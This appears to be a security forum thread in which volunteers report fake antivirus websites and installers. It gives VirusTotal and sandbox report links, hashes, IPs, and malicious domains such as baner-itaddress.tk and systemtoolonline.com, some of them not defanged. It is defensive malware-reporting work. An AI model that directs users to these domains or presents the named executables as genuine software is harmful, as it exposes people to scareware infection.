polonus
-
Not detected:
VT scan: http://www.virustotal.com/url-scan/report.html?id=2a37a186624613ebfc6eae65b4c50e14-1306520738
VT analysis: http://www.virustotal.com/file-scan/report.html?id=5cfb502b24551e7755dccc39441ea316291a5071936f496e618433b5d1d5f90f-1306528482
SOSWebscan: Main URL: -http://baner-itaddress.tk/scanner15/?afid=156 is suspicious.
See: http://wepawet.iseclab.org/view.php?hash=2a37a186624613ebfc6eae65b4c50e14&t=1306528646&type=js
Fake App Attack: Misleading Application Suspicious Notification, see:
http://www.urlvoid.com/scan/baner-itaddress.tk (dangerous)
Sent to virus AT avast dot com
polonus
-
Another Fake-AV redirect, see attached image of the wepawet scan.
Not detected by VT, flagged here: http://safeweb.norton.com/report/show?name=eikona.info
abuse at godaddy.com 184.168.204.1 (rogue campaign since mid January of this year)
polonus
-
Something must be removed, as I get no redirect to the FakeAV scan with Opera/IE8
-
Hi Pondus,
Maybe that is why the SOSWebScan came up clean, also this: http://www.google.com/safebrowsing/diagnostic?site=eikona.info
or the download went nowhere?
polonus
But what about the eval div_ hack?
D
-
avast! blocks the installer of SystemTool but not the website.
hxxp://systemtoolonline.com/ <--- SystemTool (Avast Detects the Installer as Win32:MalOb-EJ(Cryp)
-
Hi Coolmario88cp,
This concerns a rogue TREND MICRO antivirus site. Presumably malicious,
polonus
-
Fake AV not detected
FastAntivirus2011.exe
http://www.virustotal.com/file-scan/report.html?id=e4c877b4d86b15f3d74bd974cb1abe8d057fb9721bfa34eb146f7bcf7e5fb4d7-1307221293
Detected by Malwarebytes - Trojan.FakeAlert
Not detected by Superantispyware
will be in avast! and SAS inbox soon ;)
-
one more
test_severyan_sdhkjwg.exe
http://www.virustotal.com/file-scan/report.html?id=3ef9d4551d97fc72384e53d2b3741c74e44b547ca924be9f57fd1220bf8c8b33-1307223768
Detected by Malwarebytes - Trojan.FakeAlert
Not detected by Superantispyware
-
Hi Pondus,
That is a rather new one with two detections, ViCheck.ca has it
It is a revival of malware last seen 2010-10-29 now at Portlane dot network
MD5 hash e5c2bcdaf4efec616469d1f307ac5c49
VT results then: http://www.virustotal.com/file-scan/report.html?id=ddd41cb48e8d132e081dcfa04d77369dfd2827d75cba6d14fd92f32aa819675f-1288376959
New detections from 193 dot 105 dot 134 dot 192 IP=on
ever so many versions, most recent : md5=1b3a4d15224fbc89b05accea481f1e7e
md5=158336212ed8607fd1b73921b8d7d8e9
md5=3e53b7a015b5be059393f38ca71216d7
They launch three new ones every day, see also: http://info.prevx.com/aboutprogramtext.asp?PX5=1DEFB0A300A1DC14AAB7034A9D84B5004CDB5185
polonus
-
Detected only by GData at VT and SOSWebScan: http://www.virustotal.com/url-scan/report.html?id=b7cc4dc35569f5f9d3f1da92bb844111-1307540248 Trojan Fake AV
See VT file scan here: http://www.virustotal.com/file-scan/report.html?id=48d1a9554f5403d27d2013f4d833b378b30d944720b70776b5e9d694dc320b9e-1307547950
polonus
-
That is our friend Freesystemscan again...he has been very active for the last weeks
freesystemscan.exe - 6/43
http://www.virustotal.com/file-scan/report.html?id=8e6e3ef280e00b3cff1f5117d185407d4660c20adc2345d93d8f05ccae6d1856-1307561903
Malwarebytes detect as - Rogue.FakeMSE
-
Hi Pondus,
Here is the ThreatExpert report for the one you mentioned: http://www.threatexpert.com/report.aspx?md5=6a98f83a7b1e05af8235d9b407fce86f
polonus
-
Rogue.Agent/Gen-Nullo[EXE] (trojan dropper) not detected, see VT results:
http://www.virustotal.com/url-scan/report.html?id=ebc150c20ba3ca3827b0af0959f1129f-1308060320
&
http://www.virustotal.com/file-scan/report.html?id=8bdd8ffa4b776e26935f59e5c582ab627ed0953e8975aea918c074ce97db5801-1308067991
polonus